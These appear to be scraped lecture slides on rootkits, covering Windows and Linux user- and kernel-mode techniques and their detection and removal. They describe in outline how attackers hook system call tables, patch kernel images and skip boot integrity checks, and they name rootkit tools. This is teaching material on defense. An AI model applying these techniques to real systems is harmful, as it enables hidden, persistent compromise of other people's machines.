Windows User Mode Rootkits AFX Windows RootKit
Attacker uses afx windows rootkit configuration console to generate code on his machine.
Then executes it on the victim’s machine. AFX WinRK
installs itself in the System32 directory. Creates iexplore.dll and explorer.dll injects explorer.dll and iexplore.dll into
explorer.exe That process displays the GUI to users.
hides network connections, files, ...
![Page 94: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/94.jpg)
Rootkit Defenses
Preventing Root Kits Harden systems and apply patches.
Detect Root Kits File Integrity Checking (Signatures) Root Kit Identification
Look for specific changes made in most root kits
chkrootkit for Unix
![Page 95: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/95.jpg)
Kernel Mode Rootkits
Kernel Functions Process and Thread Interprocess Communication Memory File System Hardware Interrupts
![Page 96: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/96.jpg)
Kernel Mode Rootkits Kernel
Relies on hardware level protection
Ring 0 vs. Ring 3 for Intel CPU
Prevents user processes from accessing critical kernel data structures.
![Page 97: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/97.jpg)
Kernel Mode Rootkit Processes running in kernel mode
belong to the kernel. Administrator, root only invoke user
mode processes. These processes access the kernel.Change in kernel changes behavior of all processes.
![Page 98: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/98.jpg)
Kernel Mode Rootkit
Kernel Mode Rootkit Capabilities File & Directory Hiding Process Hiding Network Port Hiding Promiscuous Mode Hiding Execution Redirection Device Interception and Control
![Page 99: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/99.jpg)
Kernel Mode Rootkit
Advantages over User Level Rootkit: Changes all programs that try to
discover something from the kernel. Statically linked binary forensic tools
no longer work
![Page 100: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/100.jpg)
Linux Kernel
Get a laptop and try it out!
![Page 101: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/101.jpg)
Linux Kernel
Linux allows us to look at many internal kernel structures: /proc
Slash proc Virtual directory, lives only in memory. Lots of commands just grab info from
/proc. We can write to certain areas of /proc
such as /proc/net
![Page 102: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/102.jpg)
Linux Kernel /proc
/cpuinfo /devices /ksmg
Log messages from kernel /ksyms
List of all variables and functions that are exported via loadable kernel modules on the machine
![Page 103: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/103.jpg)
Linux Kernel
/proc /net /stat
Statistics such as data about CPU, virtual memory, hard drive usage
/sys Kernel variables.
/version
![Page 104: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/104.jpg)
Linux Kernel /dev
Contains pointers to various devices. /dev/kmem
Image of the running kernel’s memory /dev/mem
Image of all the memory
Gibberish without special tools
![Page 105: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/105.jpg)
Linux Kernel User mode processes use System Calls
to access kernel. Embedded in the systems libraries:
SYS_open SYS_read SYS_write SYS_execve SYS_setuid SYS_get_kernel_syms SYS_query_module
![Page 106: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/106.jpg)
Linux Kernel
Located in /usr/include/sys/syscall.h /usr/include/bits/syscall.h /usr/include/asm/unistd.h Or similar locations.
![Page 107: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/107.jpg)
Linux Kernel System Call Table:
Array maintained by the kernel that maps individual system call names and numbers.
Located also in memory. On harddrive:
“less /boot/System.map”
Use strace to find the system calls made by a command: “strace ls”
![Page 108: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/108.jpg)
Linux Kernel
![Page 109: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/109.jpg)
Linux Kernel Manipulations
Loadable Kernel Modules Legitimate Linux / Solaris kernel
feature Add support for new hardware Can replace existing kernel features
without system reboot.
![Page 110: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/110.jpg)
Linux Kernel Manipulations
Attacker uses insmod to Alter System Call
Table. Load Kernel
module.
![Page 111: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/111.jpg)
Linux Kernel Manipulations Evil kernel module alters SYS_execve Looks at
calling process. If process is for a program that attacker wants to
redirect Evil kernel module actually calls another program.
Attacker can wrap the true SYS_execve code. Makes it easy to generate the altered version of
SYS_execve. This alteration defeats file integrity checking tools.
SYS_execve code is still there, only Never called. Called if not interfering with attacker (if wrapped).
True login function, true sshd, true … not called, but replacements are.
![Page 112: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/112.jpg)
Linux Kernel Manipulations
Loadable kernel modules do not survive a system reboot.
Attacker alters programs in the boot process. init Once inserted, loadable kernel
module hides changes to the altered boot process
![Page 113: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/113.jpg)
Linux Kernel Manipulations
Mighty Adore Loadable kernel module Adore interface: Ava.
Kernel Intrusion System (KIS) Comes with slick GUI
![Page 114: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/114.jpg)
Linux Kernel Manipulations
Alternative to Loadable Kernel Module
Use /dev/kmem Attackers can use tools that read and
write to kernel memory image. Attacker can insert alternative code for
system calls. Attacker can change the System Call
Table.
![Page 115: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/115.jpg)
Linux Kernel Manipulations
Patching Kernel Image File Simplest way:
Attacker “patches” vmlinuz file. Contains the kernel image.
![Page 116: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/116.jpg)
Linux Kernel Manipulations
User Mode Linux (UML) UML at user-mode-
linux.sourceforge.net Runs entire Linux kernel inside a
normal user-mode process. Like VMWare, creates virtual
environment. Sysads, users are running in this
virtual environment.
![Page 117: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/117.jpg)
Linux Kernel Manipulations
Kernel Mode Linux Project Allows certain user processes to run
in kernel mode. Attacker patches kernel with KML. Attacker now has processes that run
in kernel mode. Writes code to alter system call table and
system call code.
![Page 118: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/118.jpg)
Defending the Linux Kernel Prevention
Deny superuser access to attackers. Patch quickly. Change kernel so that it no longer
allows loadable kernel modules. Redhat 8.0, Redhat 9.0, Linux 2.5.41
Install Systrace to track and limit systems calls.
Use Linux Security Module in your kernel.
![Page 119: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/119.jpg)
Defending the Linux Kernel
Kernel Mode RootKit Detection Look for suspicious network activity File Integrity Checkers (to catch the
not quite good enough hacker). chkrootkit
Looks for system anomalies. Each directory has a link count. Link count
should be equal to the number of files + 2.
![Page 120: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/120.jpg)
Defending the Linux Kernel
Kernel Mode RootKit Detection Kernel Security Therapy Anti-Trolls
(Linux 2.4) Looks for changes to the system call table. Scans /dev/kmem Looks for memory locations of system calls
and compares with System.map Creates fingerprints of system calls and
various critical programs.
![Page 121: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/121.jpg)
Defending the Linux Kernel
Kernel Mode RootKit Detection Syscall Sentry
Loadable kernel module. Checks for modules that alter the system
table. Alerts system administrator in this case.
![Page 122: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/122.jpg)
Windows Kernel
User process calls DLL
DLL can
return to user process.
Go to csrss.exe (client server runtime)
Require kernel function
![Page 123: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/123.jpg)
Windows Kernel User process makes call to ReadFile Win32 Subsytem DLL makes call to NtReadFile
in Ntdll.dll Ntdll.dll translates well-documented API into rather
obscure ones (that can be easily changed.) Ntdll.dll makes a call to the Executive.
Executive sits inside ntoskrnl.exe Determines which piece of kernel code is needed to
handle request. Kernel code interacts with hardware (disk). Uses Hardware Abstraction Layer (HAL.dll).
![Page 124: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/124.jpg)
Windows Kernel
Ntdll.dll call into kernel: System service dispatching.
Essentially a system call. Uses the System Service Dispatch
Table. Table indicates where the appropriate
system service code is located within the kernel.
![Page 125: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/125.jpg)
![Page 126: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/126.jpg)
Windows Kernel: Tools
Ctrl + Alt + Del Task Manager Process Table
![Page 127: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/127.jpg)
Windows Kernel: Tools Start Control Panel Administrative Tools Performance
Click “+” and check process
![Page 128: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/128.jpg)
Windows Kernel: Tools
DependencyWalker (www.dependencywalker.com)
![Page 129: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/129.jpg)
Windows Kernel: Tools
Process Explorerhttp://www.sysinternals.com/ntw2k/
freeware/procexp.shtml
![Page 130: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/130.jpg)
Manipulating Windows Kernel
Same basic strategies as in Linux: Evil Device Driver. Alter running kernel in memory. Overwrite kernel image on file. Deploy kernel on a virtual system. Run user-mode code at kernel level.
![Page 131: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/131.jpg)
Manipulating Windows Kernel Evil Device Driver
Alters system service call handling by loading a device driver.
Replaces or alters kernel functions. Needs administrator privileges. Needs to get evil code to run:
Overwrite existing kernel functionality Alter system service dispatch table to point
to new code. Alter System Service Dispatcher.
![Page 132: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/132.jpg)
Manipulating Windows Kernel Altering a Running Kernel in Memory:
Windows uses the Global Descriptor Table (GDT) to manage memory.
GDT stores division into various segments. Store segment accessibility by ring 0/3.
Unfortunately, attacker can add a memory segment to the GDT.
Greg Hoglund Phrak 55 Explains how to bypass Security Monitor. Add memory segment from location 0x00000000
to 0xffffffff. This gives memory access to all user processes!
![Page 133: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/133.jpg)
Manipulating Windows Kernel
Altering a Running Kernel in Memory: Manipulate \Device\PhysicalMemory
object. Use PhysMem from sysinternals.com.
Attacker can now change system functionality.
![Page 134: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/134.jpg)
Manipulating Windows Kernel Patching the Kernel on the Hard
Drive System boot checks integrity of
Ntoskrnl.exe. Thus, not possible to only change the
kernel file. Have to change both the integrity checker
and the kernel. Integrity checker sits in NTLDR.
Change one instruction to jump over the integrity check.
![Page 135: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/135.jpg)
Manipulating Windows Kernel
Patching the Kernel on the Hard Drive Patch first NTLDR to disable integrity
check. Then patch Ntoskrnl.exe to disable
security access check. Now introduce rootkit.
![Page 136: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/136.jpg)
Manipulating Windows Kernel
Create a fake system using a virtual machine. Variety of Virtual Machines
VMWare Virtual PC Plex86 Bochs
But need to hide start-up message. Unlike Linux, that is difficult.
![Page 137: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/137.jpg)
Protecting the Windows Kernel
Prevent access to the machine. Detect a rootkit:
Antivirus tools recognize most rootkit files before installation.
Some rootkits can be spotted afterwards.
Because developers were careless. File Integrity Checkers
![Page 138: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/138.jpg)
Protecting the Windows Kernel
Removing Rootkits Analyze system without invoking the
kernel. Use a FIRE or Knoppix bootable CD-
ROM and look at the hard drive. Registry / File System.
![Page 139: Viruses, Worms, Mobile Code](https://reader034.vdocuments.net/reader034/viewer/2022051002/568158b9550346895dc6024a/html5/thumbnails/139.jpg)
Next Generation Malware
BIOS Malware active before booting from a
device. Bioscentral website for tools to look at
BIOS. Microkernel